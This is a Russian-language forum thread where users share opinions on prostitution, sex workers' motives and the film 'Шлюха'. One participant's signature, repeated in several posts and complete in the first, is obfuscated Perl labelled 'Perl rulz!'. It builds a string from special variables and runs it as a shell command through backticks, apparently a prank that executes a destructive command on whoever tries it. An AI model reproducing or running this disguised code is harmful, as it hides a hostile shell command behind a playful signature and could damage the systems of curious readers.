зачем же так наотрез, хоть мнения-то наверное можно высказать? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
что наотрез?
Вот мое мнение: этим занимаются не ради удовольствия, а по нужде так сказать, а на самом деле это несчастные женщины, зачастую наркоманки, мне их жалко... _________________ iddqd
наотрез то что только к деффочкам вопрос _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
если имеется в виду добровольно, то не ради себя _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Вот меня фильм "Шлюха" бесит!!!
Все в таком свете показано, что девушкам это в кайф...Смешно даже, что они там говорят! Я думаю, конечно, что есть девушки которым это нравится. К этой категории я отношу неприкаянных нимфоманок, которым ВСЕГДА хочется, а бывает не с кем. Так почему бы не удовлетворить свои желания и еще не заработать на этом денег.
Они святые - (с) _________________ "И покорится вся земля таким как Ты, таким как Я"
Есть такая "писательница", Ксавьера Холландер, в прошлом шлюха, мадам.
pandena , наверное говорил(а) о таких как она. этой тете совершенно не важно где, когда и с кем.